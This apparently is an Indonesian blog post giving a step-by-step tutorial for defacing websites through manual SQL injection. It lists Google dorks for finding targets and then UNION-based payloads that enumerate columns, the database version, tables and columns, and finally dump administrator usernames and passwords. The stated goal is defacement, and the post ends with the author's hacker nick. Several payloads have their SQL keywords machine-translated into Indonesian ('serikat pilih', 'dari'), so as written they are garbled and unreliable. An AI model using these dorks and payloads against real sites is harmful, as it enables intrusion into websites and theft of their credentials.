Cara deface Poc SQL manual

-


Oke akmj kali ini gua akan ngasih tau Cara deface Poc Sql Manual

Bahannya akmj:
-Dork
-Script
-Shell
-Udud gan
-Kopi
-Internet

Langsung aja akmj:
1. Masukin dorknya akmj ke mbah kyta yaicu google.com
Dorking :
- inurl:? index.php id =
- inurl:? admin.php id =
- inurl:? pages.php id =
- inurl:? pages.php id =


2. Pilih salah Satu Web

Contoh => www.target.com/index.php?id=1




3. Sekarang Anda harus menambahkan ( ') pada akhir URL
contoh => www.target.com/index.php?id=1'

jika lu mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.




4. Sekarang kita harus mencari jumlah kolom




www.target.com/index.php?id=1 order by 10-- (ERROR)

www.target.com/index.php?id=1 order by 9-- (ERROR)

www.target.com/index.php?id=1 order by 8-- (ERROR)

www.target.com/index.php?id=1 order by 7-- (NO ERROR)


jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7


5. Sekarang kita harus menemukan kolom rentan

serikat www.target.com/index.php?id=1pilih 1,2,3,4,5,6,7--

jika menunjukkan angka 2 kolom maka rentan adalah 2

6. kita harus menemukan versi database

www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya




7. Sekarang menemukan nama database
serikat www.target.com/index.php?id=1pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--
ia akan menampilkan nama data base biarkan nama data base adalah "dunia"

8. Sekarang menemukan nama semua tabel

union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -


ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel


biarkan kita menemukan nama tabel "administrator"




9. Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()
kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.


10. Sekarang menemukan password dari user_name


www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator


itu akan menampilkan username dan password Kita


11. Jangan lupa nick gua ea akmj Mr,ReposadoCyber

Comments

Post a Comment